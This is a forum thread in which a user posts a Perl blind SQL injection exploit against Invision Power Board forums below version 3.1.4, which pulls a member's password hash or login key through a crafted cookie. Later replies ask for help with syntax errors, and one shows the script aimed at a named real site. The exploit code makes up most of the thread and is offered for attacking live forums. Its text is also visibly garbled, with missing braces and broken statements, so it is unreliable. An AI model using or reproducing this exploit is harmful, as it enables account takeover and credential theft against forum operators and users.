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IT Security and Insecurity Portal |
IPBoard SQL injection < 3.1.4 - Ineedforum.com |
Posted: Wed Apr 27, 2011 9:55 am |
StellDJ |
Beginner |

Joined: Mar 31, 2011 |
Posts: 3 |
Code: | #!/usr/bin/perl
## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http://)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print $target(' - IPB 2.*');
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
if(length($allchar) > 0){
print qq{bb DONE ]
MEMBER ID : $member_id
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
print "\b\b FAILED ]";
$allchar .= chr(42);
sub found($$)
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
sub crack($$)
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i = 0;
return $i;
sub check($)
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7 2%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%2 1%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);
if (/Set-Cookie: session_id=0;/) { return 1; }
return 0;
sub status()
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
sub usage()
print q(
Invision Power Board v < 3.1.4 SQL injection exploit
r57ipb3.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
0 - IPB 1.*
1 - IPB 2.*
2 - IPB 3.* (Prior To 3.1.4)
e.g. r57ipb3.pl /IPB/ 1 1
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
Last edited by StellDJ on Wed Apr 27, 2011 10:19 am; edited 3 times in total |
Re: IPBoard SQL injection < 3.1.4 - Ineedforum.com |
Posted: Wed Apr 27, 2011 9:59 am |
StellDJ |
Beginner |

Joined: Mar 31, 2011 |
Posts: 3 |
72 line write the targer url.
print (($target)?(' - IPB 3.*') ' - IPB 2.*') ' - IPB 1.*'));
i think this very good exploit but i don1t know 72 line correct syntax url pls sombady help.
Only this if you hack ipb 3 (in 72 line):
print $target(' - IPB 3.*');
Then run pl:
r57ipb3.pl [server] [/folder/] [member id] [targets]
eg: r57ipb3.pl /IPB/ 1 1 |
Posted: Mon Jul 04, 2011 11:09 pm |
tox1c |
Active user |

Joined: Sep 22, 2009 |
Posts: 41 |
i get this error.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Perl64\bin>perl 1.pl www.tr-clan.com /forums/ 1 3
syntax error at 1.pl line 72, near ");"
Can't find string terminator ")" anywhere before EOF at 1.pl line 168. |
Posted: Wed Aug 03, 2011 12:10 am |
Regular user |

Joined: Jul 29, 2011 |
Posts: 10 |
Anyone know why I keep getting this error? Trying it on a ipb 3 forum |
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